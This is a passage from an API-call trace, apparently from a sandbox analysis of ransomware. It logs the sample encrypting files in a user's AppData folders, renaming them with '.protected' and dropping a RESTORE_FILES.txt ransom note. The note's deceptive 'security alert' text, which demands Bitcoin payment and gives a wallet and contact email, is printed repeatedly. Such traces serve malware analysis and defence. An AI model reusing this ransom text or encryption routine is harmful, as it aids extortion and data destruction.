halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected")) returned 1 [0078.181] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Windows") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Program Files") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.181] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.181] lstrcmpiW 
(lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="System Volume Information") returned -1 [0078.181] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.181] StrStrIW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".protected") returned 0x0 [0078.181] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".txt") returned 0x0 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".rar") returned 0x0 [0078.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0078.182] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".zip") returned 0x0 [0078.182] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.184] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.184] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.185] CloseHandle (hObject=0x158) returned 1 [0078.185] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected") returned 169 [0078.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.protected")) returned 1 [0078.186] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Windows") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Program Files") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="Program Files (x86)") returned -1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="$Recycle.bin") returned 1 [0078.186] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="System Volume Information") returned -1 [0078.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrIW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".protected") returned 0x0 [0078.186] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".txt") returned 0x0 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".rar") 
returned 0x0 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.187] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".zip") returned 0x0 [0078.187] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.191] CloseHandle (hObject=0x158) returned 1 [0078.191] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected") returned 171 [0078.191] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected")) returned 1 [0078.192] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.192] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.192] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\RESTORE_FILES.txt") returned 110 [0078.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.192] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.192] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.193] lstrlenA (lpString="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") returned 684 [0078.193] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0078.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.193] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.193] CloseHandle (hObject=0x154) returned 1 [0078.193] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.194] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.194] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RESTORE_FILES.txt") returned 100 [0078.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.194] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.194] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.195] lstrlenA (lpString="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") returned 684 [0078.195] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.195] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.195] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.195] CloseHandle (hObject=0x150) returned 1 [0078.196] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.196] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.196] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RESTORE_FILES.txt") returned 87 [0078.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.196] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.196] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.197] lstrlenA (lpString="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") returned 684 [0078.197] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.197] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.197] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.197] CloseHandle (hObject=0x14c) returned 1 [0078.198] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0078.198] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0078.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RESTORE_FILES.txt") returned 74 [0078.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0078.198] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.198] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0078.199] lstrlenA (lpString="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") returned 684 [0078.199] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0078.199] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.199] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
